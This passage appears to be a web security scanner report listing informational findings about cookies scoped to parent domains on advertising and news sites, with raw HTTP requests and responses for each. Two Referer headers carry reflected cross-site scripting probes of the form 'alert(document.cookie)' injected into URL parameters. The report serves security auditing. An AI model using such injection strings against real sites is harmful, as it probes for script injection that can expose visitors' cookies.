Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:52 GMT
Connection: close


16.64. http://clk.redcated/goiframe/184054348/262582811/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /goiframe/184054348/262582811/direct/01

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/184054348/262582811/direct/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:50 GMT
Connection: close


16.65. http://clk.redcated/goiframe/199711109/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /goiframe/199711109/299297287/direct

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/199711109/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:45 GMT
Connection: close


16.66. http://context3.kanoodle.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://context3.kanoodle.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:05:02 GMT
Server: Barista/1.1-(eanhbg)
Connection: Close
Content-Length: 3242
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT
Set-Cookie: fc_ms_1.3=AA; domain=.kanoodle.com; path=/; expires=Sun, 06-Feb-2011 15:05:02 GMT

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: ; font-family: ; width: 160; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title { cl
...[SNIP]...

16.67. http://conveu.admailtiser.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://conveu.admailtiser.com
Path:   /st

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601 HTTP/1.1
Host: conveu.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sun, 30 Jan 2011 01:23:50 GMT
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; Domain=.admailtiser.com; Expires=Mon, 30-Jan-2012 01:23:50 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:50 GMT; Path=/
Location: http://srv.admailtiser.com/pix/master_pixel.js?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cisd=seg
Content-Length: 0


16.68. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.551781514659524 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=2:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=372
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:16:32 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzCus
...[SNIP]...

16.69. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=290
Expires: Sun, 30 Jan 2011 01:34:33 GMT
Date: Sun, 30 Jan 2011 01:29:43 GMT
Connection: close
Content-Length: 3345

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...

16.70. http://deals.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.redacted
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.71. http://dg.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight2d710%2522%253balert(document.cookie)%2F%2F68483822cd8&r=http%3A%2F%2Fburp%2Fshow%2F21 HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=79jE^0^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=79jE^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:37:55 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0


16.72. http://editorial.autos.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /article.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:08 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.73. http://editorial.autos.redacted/articles/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /articles/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.74. http://editorial.autos.redacted/blogs/autosblog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.75. http://editorial.autos.redacted/media/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /media/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.76. http://editorial.autos.redacted/media/video/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /media/video/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...

16.77. http://editorial.autos.redacted/new-cars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /new-cars/default.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.78. http://editorial.autos.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /slideshow.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
